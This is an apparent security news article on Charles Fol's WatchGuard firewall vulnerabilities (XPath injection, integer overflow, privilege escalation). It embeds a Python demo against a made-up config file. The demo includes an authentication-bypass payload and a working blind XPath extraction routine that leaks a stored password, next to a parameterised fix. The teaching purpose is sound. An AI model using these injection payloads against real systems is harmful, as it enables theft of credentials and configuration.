Ambionics Security engineer Charles Fol published an article last week explaining how he discovered 5 vulnerabilities and built 8 exploits to gain root privileges on every WatchGuard Firebox/XTM appliance.
Earlier attacks by Russian-sponsored threat actors
Earlier this year, WatchGuard firewalls came under attack several times, most notably by the Russian state-sponsored group Sandworm, which abused a privilege escalation flaw to build the Cyclops Blink botnet that was taken down in April.
Over a four-month period, WatchGuard released three firmware updates, patching a number of critical vulnerabilities.
Complete access to the firewall system as root
Of the 5 vulnerabilities Charles Fol discovered on the devices, 2 were patched by the vendor.
The remaining three are:
- a blind XPath injection, which allowed him to retrieve a device's configuration, including master credentials;
- an integer overflow, which allows an attacker to execute malicious code on remote appliances;
- a privilege escalation, from a low-privileged user to root.
“By combining the two latter, a remote, unauthenticated attacker can get complete access to the firewall system as a super user, or root” said Fol.
“This is the worst possible impact. He or she can now read or change the configuration, intercept traffic, et cetera.
“The first one, in some cases, allows an attacker to obtain the master credentials of the authentication servers, and possibly use this to connect as an administrator on the firewall.”
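To make the XPath item concrete, here is an added example, written for this article rather than taken from Fol's write-up or from any WatchGuard code: a generic login check that builds its XPath query by string concatenation, the boolean-oracle extraction a blind attacker runs against it, and the parameterised form of the same query that stops the attack. The configuration document, the element names and the login function are all constructed for the demo and assume nothing about WatchGuard's real data model; the `lxml` library is assumed to be installed.

```python
# Added example (not code from Fol's article or from WatchGuard): a generic
# blind XPath injection against a string-built query, next to the
# parameterised form that defeats it. Assumes lxml is installed.
from lxml import etree

# Constructed sample "configuration" document for the demo only.
CONFIG_XML = b"""
<config>
  <users>
    <user><name>admin</name><password>S3cr3t!</password></user>
    <user><name>guest</name><password>guest</password></user>
  </users>
  <authserver>
    <host>ldap.internal</host>
    <binddn>cn=svc,dc=corp</binddn>
    <bindpw>Hunter2</bindpw>
  </authserver>
</config>
"""
DOC = etree.fromstring(CONFIG_XML)


def vulnerable_login(username: str, password: str) -> bool:
    """Builds the XPath by string concatenation: user input becomes query syntax."""
    query = (
        "boolean(/config/users/user"
        f"[name='{username}' and password='{password}'])"
    )
    return bool(DOC.xpath(query))


def safe_login(username: str, password: str) -> bool:
    """Binds the inputs as XPath variables, so quotes in them stay data."""
    query = "boolean(/config/users/user[name=$u and password=$p])"
    return bool(DOC.xpath(query, u=username, p=password))


def oracle(login, payload: str) -> bool:
    """The only signal a blind attacker gets: did the login succeed or not?"""
    return login(payload, "x")


# Printable ASCII without the single quote, which would break the payload.
ALPHABET = "".join(chr(c) for c in range(0x20, 0x7F) if c != 0x27)


def blind_extract(login, target: str, max_len: int = 64) -> str:
    """Recover the string value of the node at `target`, one character at a time.

    Each payload closes the name='...' literal, ORs in a test, and neutralises
    the trailing "and password='x'" with a false clause, giving the predicate
        name='' or <test> or '1'='2' and password='x'
    where 'and' binds tighter than 'or', so the result is just <test>.
    """
    length = None
    for n in range(0, max_len + 1):
        if oracle(login, f"' or string-length({target})={n} or '1'='2"):
            length = n
            break
    if length is None:
        return ""  # the oracle never answered "yes": nothing leaked
    out = ""
    for pos in range(1, length + 1):
        for ch in ALPHABET:
            if oracle(login, f"' or substring({target},{pos},1)='{ch}' or '1'='2"):
                out += ch
                break
        else:
            out += "?"  # character outside the probed alphabet
    return out


if __name__ == "__main__":
    print("auth bypass          :", vulnerable_login("' or 1=1 or ''='", "x"))
    print("leaked bindpw        :", blind_extract(vulnerable_login, "/config/authserver/bindpw"))
    print("against safe query   :", repr(blind_extract(safe_login, "/config/authserver/bindpw")))
```

The point to take from the run is that the vulnerable query leaks any node the attacker can name, not only the user table it was written for, because absolute paths such as `/config/authserver/bindpw` can be evaluated from inside the predicate. Binding the inputs as XPath variables, as `safe_login` does, keeps them as string values, so the same payloads return nothing; rejecting quote characters at the input layer is a weaker second line of defence, not a replacement.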
Devices likely to be exposed
According to Fol, “The first vulnerability – XPath – is reachable through the standard client interface, and as such is much more likely to be exposed; a quick Shodan search revealed around 350,000 instances.”
He advises users to remove their administration interface from the internet and make sure they keep their systems up to date.
Dimitris is an Information Technology and Cybersecurity professional with more than 20 years of experience in designing, building and maintaining efficient and secure IT infrastructures.
Among other credentials, he is CISSP, CISA, CISM, ITIL, COBIT and PRINCE2 certified, but his broad knowledge and technical management capabilities go beyond these certifications. He enjoys acquiring new skills in penetration testing, cloud technologies, virtualization, network security, IoT and many more.